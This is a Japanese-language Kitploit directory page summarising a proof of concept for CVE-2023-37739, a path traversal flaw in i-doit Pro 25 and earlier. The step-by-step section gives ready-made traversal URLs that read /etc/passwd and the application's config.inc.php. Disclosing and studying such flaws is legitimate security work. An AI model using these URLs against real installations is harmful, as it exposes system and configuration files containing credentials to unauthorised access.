Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below — 概念実証エクスプロイト for CVE-2023-37739、i-doit Pro 25以下におけるパストラバーサル脆弱性で、認証されたユーザーが細工されたmoduleIDおよびfileパラメータを介して機密ファイルを読み取ることを可能にする。 | Kitploit
ツール/GitHubGitHub/leekenghwa/cve-2023-37739---path-traversal-in-i-doit-pro-25-and-below
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubleekenghwa/cve-2023-37739---path-traversal-in-i-doit-pro-25-and-below

CVE-2023-37739---Path-Traversal-in-i-doit-Pro-25-and-below

概念実証エクスプロイト for CVE-2023-37739、i-doit Pro 25以下におけるパストラバーサル脆弱性で、認証されたユーザーが細工されたmoduleIDおよびfileパラメータを介して機密ファイルを読み取ることを可能にする。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
2年前未レビュー

CVE-2023-37739 - i-doit Pro 25 以前におけるパストラバーサル

i-doit Pro 25 以前にはパストラバーサルの脆弱性が存在します。これらの脆弱性により、リモートの認証済み攻撃者(低権限または高権限)がユーザーがアクセスすべきではない場所に移動できる可能性があります。機密ファイルの読み取りやアクセスに悪用される可能性があります。

製品の説明: i-doit は synetics GmbH によって開発された Web ベースの IT ドキュメンテーションおよび CMDB(構成管理データベース)です。i-doit Pro はソフトウェアの商用バージョンであり、有料ライセンスが必要です。追加機能、プロフェッショナルサポート、定期的なアップデートや機能強化が含まれます。ユーザーは i-doit Pro を使用するためにライセンスを購入する必要があり、コストはユーザー数と必要な機能によって異なります。

脆弱性の説明: この Web アプリケーションでは、認証されたすべてのユーザーがアクセスすべきではない場所に移動できることがわかりました。機密ファイルの読み取りやアクセスに悪用される可能性があります...

影響を受ける Webページ: /?moduleID および /index.php

影響を受けるパラメータとコンポーネント 1 : ?moduleID=2&file_manager=image&file

影響を受けるパラメータとコンポーネント 2 : ?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=

ステップ1: 有効なユーザーとしてログインします。低権限でも高権限でも構いません。以下のURLに移動し、../../../ を読み取りたいファイルのパスに編集します。

step1

例1: http://IP/?moduleID=2&file_manager=image&file=../../../../../../..//etc/passwd

例2: http://IP/index.php?viewMode=1100&objID=56&tvMode=1006&catgID=27&objTypeID=39&editMode=0&objGroupID=2&moduleID=2&file_manager=image&file=../../../src/config.inc.php

step2

step3

step4

ツールをダウンロード